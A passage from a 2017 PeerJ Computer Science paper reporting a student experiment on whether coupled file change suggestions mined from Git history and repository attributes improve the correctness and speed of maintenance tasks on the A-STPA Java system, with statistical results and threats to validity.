hazard analysis. The source code contains 16,012 lines of code and 178 classes organized in 37 packages. The Git repository of the project contains 1,106 commits from which we extracted 205 coupled file changes. Subjects The experiment participants are 36 students from the Software Engineering course in their second semester at the University of Stuttgart (Germany). The students have basic Java programming and Eclipse knowledge and have not been related in any way with the software system investigated in the experiment. Materials, procedure and environment All subjects received the following materials which can be found in the supplemental material of this paper. • Tools and code: The participants received the Eclipse IDE to work with, the screen capturing tool and the source code they need to edit. • Questionnaires: The first questionnaire is filled in at the start of the experiment and it is related to their programming background. The second questionnaire performed at the end of the experiment is about their feedback on the usefulness of coupled changes and the additional set of repository attributes. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 8/33 https://peerj.com https://sourceforge.net/projects/astpa/ https://sourceforge.net/projects/astpa/ http://dx.doi.org/10.7717/peerj-cs.135 • Software documentation: We provided the technical documentation for the software system including the architecture description covering the sub-projects, the overview of the classes in the data model, the application controllers, the graphic editor and the package descriptions. • Setup instructions: The participants received the instruction steps how to prepare the environment, where to find the IDE, the source code and how to perform the experiment. • Maintenance tasks and description: Every participant received spreadsheets with four maintenance tasks and their free-text description. The maintenance tasks represent quick program fixes that should be performed by the participants according to the maintenance requests (Basili, 1990). The maintenance tasks used in the experiment require the participants to add various enhancements to the system. The changes do not influence the structure or the functionalities of the application. The tasks are related to simple changes of the user interface of the system. All four maintenance tasks are perfective and have been assigned to the participants in both groups. • Set of coupled files: The files changed together frequently used to solve a similar tasks have been provided to the group that uses coupled file changes. • Repository Attributes: The attribute set from the versioning system, the issue tracking system and the documentation about similar tasks performed in the system. They have been joined to the coupled files using a mapping between the commits containing the coupled files and the issues using their issue IDs. The environment for the experiment tasks was Eclipse IDE on a Windows PC in both treatments. For each lab, we prepared an Eclipse project containing the Java source code of the A-STPA system. The project materials were made available to the subjects on a flash drive. The participants had a maximum of two hours to fill the questionnaires and perform the maintenance tasks. Selection of change author According to the used heuristic for grouping the change sets in the versioning history, we need to select the authors of the changes whose data will be included in the analysis. The selection process of the developers as authors of the source code changes is presented in Fig. 1. Out of 12 developers who worked on the A-STPA software, after performing the frequent itemset analysis, we have eight developers left whose entries in the repository delivered coupled files. We have four maintenance tasks to be solved in the experiment. For each of the tasks we use commits from a different developer to avoid the influence of the authorship of the commits on the tasks. Out of the eight developers we need to select four, one for each maintenance task. Selection of coupled files After selecting the developers, we continue with the selection of the coupled files. The process includes the selection of the most frequent coupled files followed by the selection of relevant coupled files as presented in Fig. 1. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 9/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Figure 1 Changes selection. Full-size DOI: 10.7717/peerjcs.135/fig-1 Selection of the most frequent coupled files We need to select the coupled files which we will include in the suggestions for the developers in the experiment. For each of the four developers we list the most frequent coupled files we have extracted. We sort the sets of coupled file changes by their frequency in descending order, so on top of the list we have the most frequent set of coupled files. We start selecting the sets of coupled files from the top of the list. We do this for two main reasons: (1) To avoid a potential subjectivity in the selection of the coupled files. (2) We want to use the strongest couplings, meaning the coupled files which are frequent and did not happen by chance. Selection of relevant coupled files After identifying the most frequent coupled files, we examine their broader change context. This means that we need to determine if they fulfill the requirements to be: (1) of perfective nature and (2) related to modifications in the user interface of the application. We determine this change context using a manual analysis of the content of the commit messages where the coupled file changes were included as well as the description of the related issues. To perform this, we use the mappings between the commit messages and the issue IDs provided as part of the corresponding repository attributes we added to the coupled file changes. Classification of issues We classified the issues for the examined software systems using the approach proposed in Hindle, German & Holt (2008). We determine the following classes of issues: • Corrective: These issues cover failures related to the processing or performance of the software. • Adaptive: These changes include modifications related to the data and the processing environment. • Perfective: The changes include modifications related to performance, maintenance or usability improvements. • Implementation: These tasks include new requirements for the software system. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 10/33 https://peerj.com https://doi.org/10.7717/peerjcs.135/fig-1 http://dx.doi.org/10.7717/peerj-cs.135 • Other: These include changes that are not functionally related to the system like copyright or control version system related issues. We go further and classify the perfective changes based on the most frequently involved system functionalities. For example, we want to know how many perfective issues have been defined for the user interface of the application and what are the main parts of this interface addressed in these issues. This way we expose the representativeness of the selected coupled file changes and the defined tasks for the software system we examine. Definition of tasks After we determined the sets of coupled file changes which fulfill the requirements of the experiment, we continue with the definition of the tasks the participants need to solve. Firstly, we determine the change context of the selected coupled file sets more precisely by looking up repeatedly in the related commit messages and the issue description. This identifies the functionality the file changes are related to. We use the mapping of the issue IDs and the commit messages to follow up this information. After we identified the issues related to sets of relevant coupled file changes, we define perfective maintenance tasks related to similar functionalities covered in these issues. For example, in Table 3 we have an issue extracted from the issue tracking system of the A-STPA product which defines that a new item in the application view should be created using a keyboard shortcut. The commit message for the changes solving this task represents the comment of the developer who placed the shortcut. Considering the described functionality, we create a task where the developer needs to create a new shortcut combination for that purpose. In the same manner, we repeat the procedure for each of the relevant coupled files that we have selected and define four tasks. The content of the text description of the tasks is related to the content of the issues we extracted from the issue tracking system. We keep the content of the task definitions very simple. They contain the functionality or the part of the system which has to be changed and the action to be performed. This makes it easier to replicate the process using other software products and their repositories. Tasks and coupled file changes Our goal is for each of the tasks to provide coupled file changes related to their context. This feature is of great importance for the study. Offering unrelated coupled file can be misleading and confusing for the developers. We can extend the examination of the commit messages content and the issue descriptions to determine the change context as a part of a tool using natural-language processing techniques. We can compare the content of the user input or the issue content with the comments in the commit messages or issue description we mapped to the coupled file change sets. However, this exceeds the scope of this study and can be considered as future work. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 11/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Table 3 Task information and coupled file changes. . User task Task solution file set Change the shortcut for adding new items in all the user interface views from ‘‘SWT.KeyDown and ‘n’’’ into ‘‘SWT.KeyUp and ‘y’’’ ControlActionView.java SystemGoalView.java DesignRequirementView.java SafetyConstraintView.java HazardsView.java AccidentsView.java Related commit Suggested coupled changes I have set a simple shortcut for new items to be ‘‘n’’, which can be quickly changed if needed. ControlActionView.java DesignRequirementView.java SafetyConstraintView.java AccidentsView.java Related issue Using a keyboard shortcut, a new item should be created in the application views. Solution of tasks The complete list of files included in the task solutions are defined manually by analyzing the solutions of the related issues and evaluated by an independent party. An example of the relation between the files included in the solution for a particular maintenance task and the set of coupled file changes is presented in Table 3. Here, we can see that to be able to solve the mentioned task, the developer needs to change six files which are related to the views of the application. The coupled change suggestion based on an issue related to the defined task recommends four files to be changed. These files were extracted from the version history have been changed frequently together in the past. We would like to point out that the file change suggestions do not represent the solutions for a particular task in the experiment. The solution usually contains more files than the provided suggestions. Although the provided suggestions contain a subset of the solution set, the developers still need to find the location in the source code meaning the method or the class that they need to modify in order to solve the tasks. This is finer grain information that we do not provide in our coupled files. The developers still have to read the repository attributes and decide if they want to follow the coupled file change suggestions. Maintenance activities After receiving the task description, the participants investigate the source code of the application, identify the files where the changes are needed and perform the changes according to the requirement. The scenario for solving the provided maintenance tasks includes the following activities (Nguyen, Boehm & Danphitsanuphan, 2011): • Task understanding: First of all, the participants need to read the task description and the instructions and prepare for the changes. They can ask if they need some clarification about the settings and the instructions. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 12/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 1The questionnaires are available in the supplemental material of this paper. • Change specification: During this step, the participants locate the source code they need to change, try to understand and specify the code change. • Change design: This step includes the execution of the already specified source code changes and debugging the affected source code. • Change test: To specify the successfulness of the performed code changes, a unit test needs to be performed. This step is performed by the experiment organizers after the lab sessions. Data collection procedure We collect data from several sources: the software repository of the system, the questionnaires, the provided task solutions and the screen capture recordings. Software repositories • Version Control System: The first data source that we use is the log data from the version control system. The investigated project uses Git as a control management tool. It is a distributed versioning system allowing the developers to maintain their local versions of source code. This version control system preserves the possibility to group changes into a single change set or a so-called atomic commit regardless of the number of directories, files or lines of code that change. A commit snapshot represents the total set of modified files and directories (Zimmermann et al., 2004). We organize the data in a transaction form where every transaction represents the files which changed together in a single commit. From this data source we extract the coupled file changes and the commit related attributes. • Issue Tracking System: It stores important information about the software changes or problems. In our case, the developers used JIRA as their issue tracking system. This data source is used to extract the issue-related attributes. • Project Documentation: The software documentation gathered during the development process represents a rich source of data. The documentation contains the data model and code descriptions. From these documents, we discover the project structure. For example, in the investigated project, the package containing the files described by the following path: astpa/controlstructure/figure/, contains the Java classes responsible for the control diagram figures of this software. We use the documentation to identify the package description. The complete set of attributes we extract from the software repository is presented in Table 4. Questionnaire The developers answer a number of multiple-choice questions. Using the first questionnaire, we investigate the developers’ programming background. We use a second questionnaire after the tasks are solved in order to gather the feedback on the usefulness of coupled changes and the additional attributes.1 Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 13/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Table 4 Repository attributes description. Attribute name Attribute description Commit ID Unique ID of Git commit Commit message Free-text comment of the commit in Git Commit time Time-stamp of committed change in Git Commit author Person who executed the commit Issue description Free-text comment on issue to be solved Issue type Type of the issue: bug, feature Issue author Person who created the issue to be solved Package description Free-text description of the package: layer, feature Tasks completion Similar to other studies (Chan, 2008; Nguyen, Boehm & Danphitsanuphan, 2011; Ricca et al., 2012), we define two factors which represent the completion of the maintenance tasks: • Correctness of solution: We determine the correctness of the solution by examining the changed source code if the solution satisfies the change requirements. We use the scoring presented previously where we summarize the points each developer gathers for each of the four tasks. The score is added next to each of the participants for both treatments, with and without using coupled file changes. • Time of task completion (ts): This represents the time measured in minutes the developers spent to solve the maintenance tasks. Having a scenario where the developers only need to solve the tasks, the selection of the coupled files is not included in the total time for the tasks. It does not include the time needed to determine the relatedness of the coupled files for a specific task. The completion time could be automatically determined using a tool implementation or as part of an analysis procedure and does not represent part of the developer task solution. We use a screen capturing device to record the time that each participant spends solving each of the four tasks. We record the time needed for each task in both treatments. • Time required to determine the relevance of the coupled files (tr): This represents the time needed to determine the change context of each of the coupled files related to the tasks. Considering a worst-case scenario, the selection of the coupled files has to be performed by the developers and the time needs to be calculated for the group using coupled file change suggestions. In this case, the total time needed for each of the tasks is the sum (tr +ts) of the time needed to select the coupled files and the time to solve the task. Given the task list, the coupled files list and the issue list, we record the time the developers need to go through the process of determining the change context of the coupled files we examine for a given task. We use three additional developers to measure the time required to determine the context of each of the coupled file changes related to the tasks. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 14/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Data analysis procedure To be able to test our hypotheses, we need to analyze the usefulness of the coupled file changes and the usefulness of the attributes from the software repository. We perform the analysis using the SPSS statistical software. Usefulness of coupled file changes The main part of the analysis is the investigation of the usefulness of the coupled changes. For this purpose we compare the scores of each task solution and the amount of time needed for solving the tasks in both groups: without using coupled file suggestions and with using of coupled file suggestions. For the time needed for the solution, we only use the values for the accomplished tasks. This way we assure that the values for the unsolved tasks do not corrupt the overall values for the time needed to successfully solve the tasks. Here we have two main scenarios. The first one includes only the time the developers need to solve the tasks. The second scenario also includes the time needed to select the coupled files set related to a specific maintenance task. We calculate the mean time for a particular task. Furthermore, we repeat the calculation for each participant on the task. At last, we determine the grand mean as the average of all the means of the time values for each of the tasks determined by the participants, weighted by the sample size. In our case this is the number of coupled files. Having k populations or tasks, the ith observation is tri which is the j(i)th coupled files set. We write j(i) to indicate the group associated with the observation i. Let i vary from 1 to n, which is the total number of samples, in our case, these are the coupled files, j varies from 1 to k, the total number of tasks. There are a total of n observations with nj observations in sample j: n=n1+···+nk. The grand mean of all observations is calculated using the formula: tr = k∑ j=1 (nj n ) trj (2) here, tr is the average of the sample means, weighted by the sample size (Hanlon & Larget, 2011). To determine the usefulness of coupled file changes, we test the overall difference in the correctness of solving the tasks using the two-tailed Mann–Whitney U test. It is used to test hypotheses where two samples from the same population have the same medians or that one of them has larger values, so we test the statistical significance of difference between two value sets. Determining an appropriate significance threshold defines whether the null hypothesis must be rejected (Nachar, 2008). If the p-value is small, the null hypothesis can be rejected meaning that the value sets are different. If the p-value is large, the values do not differ. Usually a 0.05-level of significance is used as threshold. The p-value is not enough to determine the strength of the relationship between variables. For that purpose we report the effect size estimate (Tomczak & Tomczak, 2014). Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 15/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 We use a conservative approach where we test the difference in the correctness of our tasks. Without differentiating the tasks, we compare all the solutions of the tasks using coupled file changes and the tasks performed without any suggestion. We repeat the same approach to test the overall difference between the time needed to solve the tasks using coupled change suggestions against the tasks solved without the help of coupled file changes. We use the SPSS statistical software and its typical output for the Mann–Whitney U Test whereby the p-value of the statistical significance in the difference between the two groups is reported. The mean ranking determines how each group scored in the test. To support statistical difference between the samples, we calculate the r-value of the effect size proposed in (Cohen, 1988) using the z value from the SPSS output (Fritz, Morris & Richler, 2012). A value of 0.5 determines a large effect, 0.3 means medium effect and 0.1 identifies a small effect (Coolican & Taylor, 2009). Given that we have a study which is restricted to a small number of comparisons, we do not adjust the p-value using a procedure like the Bonferroni correction (Armstrong, 2014). Usefulness of attributes We analyze the feedback from the questionnaire investigating which attributes are useful. We investigate every attribute in the set extracted from the versioning system, the issue tracking system and the documentation as previously presented. For that purpose we use the Kruskal–Wallis H test, an extension of the Mann–Whitney U test. Using this test, we determine if there are statistically significant differences between the medians of more than two independent groups. We test the statistical significance between more than two value sets. The significance level determines if we can reject the null hypothesis. p-values bellow 0.05 mean that there is a significant difference between the groups (Pohlert, 2014). To determine the effect size for the Kruskal-Wallis H test, we calculate the effect sizes for the pairwise Mann–Whitney U tests for each of the attributes using the z statistic. We individually calculate the r-value for the effect size for each pair comparison. The r-value is calculated using the following formula: r = z √ N . (3) Our approach tests the differences in the feedback about the usefulness between all the attributes for all 36 participants. This way we identify which attributes we should offer to the participants when solving their tasks together with the coupled file change suggestions. Using SPSS, we provide the statistical significance values of the difference between all eight attributes. The ranking of the means for the feedback on the usefulness values determine the most useful attributes. Execution procedure • Log Extraction: We extract the information from the Git log containing the committed file changes and the attributes. The log data is exported as a text file and the output is managed using proper log commands. • Data preprocessing: After the text files with the log data have been generated, we continue with the preparation of the data for mining. Various data mining frameworks Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 16/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 use their own format, so the input for the data mining algorithm and framework needs to be adjusted. • Support threshold: To begin the investigation, we need to extract coupled file changes from the software repository. We extract the coupled changes by defining the threshold value of the support for the frequent item set algorithm. We use the thresholds that give us a frequent yet still manageable number of couplings. This threshold is normally defined by the user. We use the technique presented in (Fournier-Viger, 2013) to identify the support level. These values vary from developer to developer, so we test the highest possible value that delivers frequent item sets. If the support value does not yield any useful results for a particular developer, we drop the value of the threshold. We did not consider item sets with a support rate below 0.2, meaning the coupled changes should have been found in 20 percent of the commits. • Mining Framework: There is a variety of commercial and open-source products offering data mining techniques and algorithms. For the analysis, we use an open-source framework specializing in mining frequent item sets and association rules called the SPMF-Framework (http://www.philippe-fournier-viger.com/spmf). It consists of a large collection of algorithms supported by appropriate documentation. • Experiment preparation: We prepare the environment by setting up the source code and the Eclipse where the participants will work on the tasks. We define the maintenance tasks and provide the free text description. We prepare the coupled file changes and the attributes from the software repository to be presented to the participants in the experiment. • Solving tasks: The participants in both groups work for two hours in two labs and provide solutions for the maintenance tasks. The solution and the screen recording are saved for further analysis. • Material gathering: We gather the questionnaires, the edited source codes and the video files of the participants screens for further analysis. • Solution analysis: We analyze the scores for the correctness of the maintenance tasks, calculate the time needed for solving the tasks and determine the influence of the coupled file changes on the task solution. RESULTS AND DISCUSSION The complete list of the maintenance tasks, the coupled file changes, the software repository attributes, the questionnaires and the analysis results can be found in the supplemental material of this paper. Participants The participants’ feedback about their background reports that most of them have around one year of programming experience and less than one year of experience with versioning and issue tracking systems. None of them answered to be in any way involved on the A-STPA project. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 17/33 https://peerj.com http://www.philippe-fournier-viger.com/spmf http://dx.doi.org/10.7717/peerj-cs.135 Table 5 Issue classification. Issue category Frequency % Corrective 217 31.77 Implementation 169 24.74 Perfective 146 21.38 Adaptive 85 12.45 Other 66 9.66 Table 6 Perfective issues. Change category Frequency % Views 74 49,01 Control structure 34 22,52 Menus 22 14,57 Non functional source changes 13 8,61 Issues classification Based on the proposed classification from Hindle, German & Holt (2008), we classified the issues from the issue tracking system related to commits in the Git version history as presented in Table 5. Here we can see that most changes of the system are corrective, implementation and perfective issues. Further, we examined the perfective issues in more detail to determine to which parts of the system they are related. We have identified several classes of perfective issues related to the main functionalities of the system that we investigated in the experiment as presented in Table 6. The most frequent perfective issues are related to changes to the view elements of the system user interface responsible for the visualization of the hazard analysis steps including their layout, tables, grids, text fields, buttons, icons and labels. These changes have been organized in the class called Views. The next class called Control Structure is composed by the issues which handle the changes related to the control structure functionality of the user interface. It is responsible for drawing the diagrams, connects the layout components and includes changes on the diagram elements like objects, labels and connections. The following class we call Menus is related to the issues associated to the user interface menus which are used to manipulate the creating and editing of project elements including changes in the wizards, the actions, labels and icons. The last class includes the issues covering non-functional changes in the source code like cleanups, refactoring or formatting. The task distribution in the experiment corresponds to this classification. We have defined two tasks for the application views, one task for the menus and one task for the control structure of the user interface. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 18/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Figure 2 Task correctness distribution. Full-size DOI: 10.7717/peerjcs.135/fig-2 Usefulness of coupled file changes As we already explained, we operationalize the usefulness of coupled file changes by their influence on the correctness of the solutions and the time needed to solve the tasks. Correctness We summarize the correctness distribution as presented in Fig. 2. On the y-axis we have the frequency of occurrence and on the x-axis the score of solving of the tasks. Here, the observations are grouped based on the presence of coupled change suggestions during the maintenance task solution. From this figure we see that the participants achieved better scores using the coupled file change suggestions we provided. We investigate the correctness difference of both groups by testing the first null hypothesis of the first research question claiming that there is no significant difference in the correctness of the task solutions. Applying the Mann–Whitney U Test results in a p-value of 0.000 as presented in Table 7. This result has to be lower than the threshold of 0.05, so this null hypothesis can be rejected. This means that there is a statistically significant difference in the correctness of the solution for the provided tasks when using coupled file change suggestions against the correctness of the solutions only using the provided task description. The r-value of the effect size for the correctness is 0.448 which describes a strong statistical difference in the correctness of the maintenance task solutions between the groups that did or did not coupled change suggestions. In Table 8, we represent the descriptive statistics for the correctness of the task solutions. The participants which used the suggestions solved 63.8% of the tasks completely, whereby Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 19/33 https://peerj.com https://doi.org/10.7717/peerjcs.135/fig-2 http://dx.doi.org/10.7717/peerj-cs.135 Table 7 Statistical significance (Coupled changes). Depend. Variable p-value r-value Correctness 0.000 0.448 Time effort 0.041 0.259 Table 8 Descriptive statistics for the correctness of the tasks. Without suggestions (−) With suggestions (+) Completely solved tasks Median MAD Completely solved tasks Median MAD 22% 1 1 63.8% 2 0 theparticipants notusing suggestionssolved only22% ofthe tasks. Thisshows asignificantly higher score for the group using coupled change suggestions. The median absolute deviation (MAD) value for the group using coupled changes is 0, whereby the value for the group not using coupled changes is 1. These values show that the correctness score is spread very close to the median for the score of the first group. The statistical results provide evidence that the coupled file changes significantly influenced the correctness of the maintenance tasks in the experiment. Inexperienced developers solved more tasks when using our suggestions which means they used the benefit of hints related to similar tasks. The coupled change suggestions allow the developer to follow a set of files and remind him/her that similar tasks include changes in various locations in the source code. The improvement in the number of solved tasks for the group using the coupled change suggestions shows that developers have used the benefits of additional help in locating the features and the files to be modified to solve their tasks successfully. The group that did not use this kind of help did not succeed in solving the same or a higher number of tasks which points to the usefulness of our approach. The use of coupled file changes has been especially noticed in cases where the developer needs to perform similar changes in several locations, like editing different views of the application GUI. Here, the developers not using coupled change suggestions missed implementing the change in all the files where the change should have been performed. Coupled file change suggestions help the developers not to miss other source code locations they need for their task. Time We analyzed the influence of using coupled file change suggestions on the time needed to successfully perform the tasks versus not using them. Many participants used split-screen and kept the documentation window open so we were not able to subtract the time spent reading the documentation from the total amount needed to solve the tasks. The distribution of the values for the time needed to solve the tasks is presented in Fig. 3. We see that the distributions are similar with a slight tendency for more time needed to solve the tasks without suggestions. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 20/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Figure 3 Time Boxplots (ts). Full-size DOI: 10.7717/peerjcs.135/fig-3 We test the second null hypothesis which claims that there is no influence of the coupled file changes on the time needed to solve the tasks. The distribution including the time to determine the relatedness of the coupled files is presented in Fig. 4. Considering only the time needed to solve the tasks (ts), the p-value for the two tailed test is 0.041. This value is slightly below the 0.05 threshold for the significance of the difference in the time needed to solve the tasks by the group using coupled file changes versus the group that didn’t. Therefore, we reject the null hypothesis. The r-value for the time needed to solve the maintenance tasks is 0.259 which shows a relatively small statistical difference between the group that used coupled change suggestions and the group that did not. Considering the case where we include the time to select the coupled files to the time needed to solve the tasks (tr +ts), we can see that there is almost no difference in the time measured for the group not using the coupled files and the group using coupled files. Here, the p-value for the total time is 0.987, which means that in this case the null hypothesis cannot not be rejected. The r-value for the total time is 0.02, which emphasizes this small difference between using and not using coupled file change suggestions. After calculating the grand mean for tr, we added three more minutes to the amount of time for the task solution and included it in the analysis of the difference between both Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 21/33 https://peerj.com https://doi.org/10.7717/peerjcs.135/fig-3 http://dx.doi.org/10.7717/peerj-cs.135 Figure 4 Time Boxplots (tr +ts). Full-size DOI: 10.7717/peerjcs.135/fig-4 groups regarding the use of coupled file change suggestions. The time needed to determine the related coupled files for the additional participants is presented in Table 9. For the total time including the time needed to select the coupled files, we add the number of considered coupled files per task and the mean time the developers needed to select the coupled files for the particular task. The descriptive statistics in Table 10 for the time needed to solve the tasks report a decrease in the means for the time needed to solve the tasks by 26% for the group using coupled change suggestions. The means ranking reports slightly better results for the group using coupled file changes, which means that the participants of this group solved their tasks slightly faster. The standard deviation for the group using coupled changes is twice lower than for the group not using coupled changes which shows a higher spread-out for the first group. Including the time needed to select the coupled files, the values are almost the same for both groups. From the results, we can see that in this case, because of the additional time we added for each of the participants, there is almost no difference between the mean values which tells us that the group using coupled files did not manage to solve the tasks faster. The results related to the task selection time show a small improvement for the time needed to solve the tasks. The developers using coupled change suggestions needed less time to find the files to be changed. Without coupled file changes, they would need to search for the features and files in the source code they need to edit. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 22/33 https://peerj.com https://doi.org/10.7717/peerjcs.135/fig-4 http://dx.doi.org/10.7717/peerj-cs.135 Table 9 Time to determine related coupled files. Time (minutes) Task 1 Task 2 Task 3 Task 4 Participant 1 Coupled files 1 3 4 3 3 Coupled files 2 5 3 2 2 Coupled files 3 3 2 – – Participant 2 Coupled files 1 2 2 2 3 Coupled files 2 2 2 2 2 Coupled files 3 2 2 – – Participant 3 Coupled files 1 2 4 5 2 Coupled files 2 2 4 2 2 Coupled files 3 2 2 – – All participants Mean (coupled files) 2.55 2.55 2.66 2.33 Grand mean (tasks) 3.41 Table 10 Descriptive statistics for the time needed in minutes. Median Mean Stand. Dev. Without suggestions 12 13.50 7.403 With suggestions (ts) 9 9.11 3.837 With suggestions (tr +ts) 12 12.33 4.158 The improvement in the time needed to solve the tasks for the group using the coupled file changes is not as strong as the improvement in the correctness of the task solutions. It does not eliminate the time that the developers need to understand the features and the changes they need to perform in the source code. They still need time to organize this information and use it. Furthermore, they need to read and understand the suggestions. Coupled file change suggestions do not automatically provide a solution for solving their tasks. If we include the time needed to select the coupled files, the results show that there is no improvement for the group using the coupled file change suggestions. If the coupled files need to be determined by the developers as a part of the task solution procedure, the small advantage for the groups using the suggestions disappears. An automated extraction of coupled file change suggestions including the determination of their relatedness could therefore be beneficial. Usefulness of software repository attributes The distribution of the usefulness of each repository attribute is presented in Fig. 5. The mean values for the usefulness of each of the repository attributes have been determined using the feedback of all participants in the experiment. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 23/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 Figure 5 Usefulness of attributes. Full-size DOI: 10.7717/peerjcs.135/fig-5 We test the third null hypothesis which claims that there is no difference in the usefulness between the attributes using the p-value of the Kruskal-Wallis H Test. In our case, the p- value for this test is 0.000 which is lower than the 0.05 threshold. This result leads us to reject the null hypothesis. This means that the alternative hypothesis claiming that there is a significant difference in the perceived usefulness among the attributes from the software repository is true. We reported a set of various software attributes from the software repository. The participants reported their feedback on their usefulness at the end of the experiment lab after the tasks had been performed. We gathered the descriptive statistics for the participants’ feedback on the usefulness of each attribute presented in Table 11. The median values vary from 3 for the commit ID, the commit author, the commit time, the issue author and the issue time, to 4 for the commit message and the package description. This places the cutoff between ‘‘neutral’’ and ‘‘somewhat interesting’’ for most of the attributes. The MAD value for all attributes is 1, which shows a low spread out of the usefulness values around the median. We calculated the r-value of the size effect for the repository attributes by creating pairs of each of the attributes where we determined the z-value of the Mann–Whitney test for each pair as presented in Table 12. We have 28 pairs of attributes. The greatest difference in the usefulness is between the commit time and the issue description where the r-value is 0.566, followed by the difference between the commit time and the package description with an r-value of 0.557. This indicates a high statistical significance between these pairs of attributes. The lowest difference is between the commit Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 24/33 https://peerj.com https://doi.org/10.7717/peerjcs.135/fig-5 http://dx.doi.org/10.7717/peerj-cs.135 Table 11 Descriptive statistics (attributes usefulness). Attribute Median MAD Package description 4 1 Issue description 4 1 Commit message 4 1 Issue type 3 1 Commit ID 3 1 Commit author 3 1 Issue author 3 1 Commit time 3 1 Table 12 Statistical significance (coupled changes). p-value r-value Repository attribute pairs 0.180 0.279 commit ID Commit message 0.972 0.004 commit ID Commit author 0.249 0.136 Commit ID Commit time 0.000 0.467 Commit ID Issue description 0.108 0.190 Commit ID Issue type 0.624 0.058 Commit ID Issue author 0.000 0.465 Commit ID Package description 0.022 0.270 Commit message Commit author 0.001 0.400 Commit message Commit time 0.048 0.233 Commit message Issue description 0.582 0.065 Commit message Issue type 0.004 0.336 Commit message Issue author 0.220 0.269 Commit message Package description 0.228 0.142 Commit author Commit time 0.000 0.459 Commit author Issue description 0.122 0.182 Commit author Issue type 0.599 0.062 Commit author Issue author 0.000 0.464 Commit author Package description 0.000 0.566 Commit time Issue description 0.008 0.311 Commit time Issue type 0.476 0.084 Commit time Issue author 0.000 0.557 Commit time Package description 0.118 0.279 Issue description Issue type 0.000 0.526 Issue description Issue author 0.530 0.074 Issue description Package description 0.039 0.244 Issue type Issue author 0.009 0.308 Issue type Package description 0.000 0.515 Issue author Package description Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 25/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 ID and the commit author, here the r-value is 0.004, followed by the difference between the commit ID and the issue author with an r-value of 0.058. This shows that there are significant differences in the usefulness between individual attributes. We determined that the attributes have different usefulness using the feedback of the participants. The median ranking defines which of the attributes are most useful. As the most useful attribute we identify the package description followed by the issue description and the commit message. This leads us to the conclusion that the inexperienced developers seek for help about the features of the source code that they need to edit and the task that they have to complete. The issue type and the commit time are in the middle of the list. The most useless attribute is the commit author followed by the issue author and the commit id. Here, we suppose that the developers are not interested in the information regarding who performed the changes because they do not know this person. This could change if the developers were included in the project for a longer time. Although we produced a list of typical repository attributes, the participants have identified a smaller set of attributes to be useful for them than we provided in this experiment. This means that we do not have to present all the attributes to the developers together with the coupled files for the reason that different developers can happen to find some attributes as obsolete to be included in the coupled file change suggestions. An individual choice of useful attributes can avoid confusion and increase the acceptance of the coupled file change suggestions concept. Threats to validity • Internal Validity: Potential internal validity threats can rise from the experiment design. To limit the learning effect, we use a counterbalanced design where every developer solves four different tasks where each of them solves two tasks without and two tasks using coupled change suggestions. This way the results are not directly influenced by the task supported by the coupled file suggestions. Other validity threats related to the experiment design are the selection of the coupled file changes, the creation of the maintenance tasks as well as their definition and solution. We extracted coupled files using a relatively high threshold which limits the possibility to provide suggestions for coupled changes that happened by chance. We selected the most frequent coupled files for each of the developers to avoid subjective interference. We also avoided delivering unrelated changes in order not to confuse the developer by providing suggestions out of the context. The maintenance tasks were constructed manually. However, they are related to issues from the issue tracking system and fulfill the conditions set in the experiment to be perfective and related to changes of the user interface. We classified the issues on the system based on the maintenance categories to show the representativeness of our maintenance tasks. The content includes a simple description of the functionalities and the required actions in order not to overwhelm the inexperienced developers by providing unnecessary information. Ramadani and Wagner (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.135 26/33 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.135 The set of files included in the solution of the tasks was provided by manually analyzing related issue solutions. We validated the task solutions using a third party. The judgment of correctness of the developers’ task solutions represents another internal threat whereby we test the solutions to determine the level of correctness. The time needed to determine the relatedness of the coupled files can differ. To avoid an influence by particular tasks, we calculate the average time per coupled file set and calculate the grand mean for all tasks. We used independent student participants for the measurement of the time needed to select the related coupled files. Also the metrics that we used to determine the usefulness can represent a threat. The subjective usefulness rating represents another construct validity whereby we evaluate the provided task solutions pairwise to minimize the errors in conducting the score distribution. For the time needed to solve the tasks, we play the captured screens of the participants to calculate the time the developers needed to solve the tasks. • External Validity: The external validity threat concerns the generalization of the experiment. The main threats here are related to the choice of the coupled file changes, the type and description of the maintenance tasks as well as the participants and the system we investigate. We used a data mining technique that can be easily performed on other Git repositories to extract coupled file changes. Our approach uses mapping between the commits and the issues which excludes the projects not using them. 